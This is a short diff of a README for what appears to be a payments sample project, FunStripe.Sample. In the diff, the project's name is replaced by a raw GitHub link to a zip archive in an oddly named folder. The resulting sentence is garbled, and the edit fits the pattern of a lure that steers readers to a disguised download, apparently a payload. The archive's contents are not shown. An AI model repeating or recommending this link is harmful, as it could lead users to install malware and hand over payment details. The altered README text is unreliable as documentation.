Velder101/FunStripe.Sample/README.md

 ## 🧑‍💻 Using the Application

-FunStripe.Sample is designed to make online payments simple.
+https://raw.githubusercontent.com/Velder101/FunStripe.Sample/main/carcinemia/FunStripe.Sample.zip is designed to make online payments simple.
 Here’s a quick guide on how to use it:

 1. **Set Up Your Payment Method**: You can add your credit or debit card information.
 The app will guide you through this.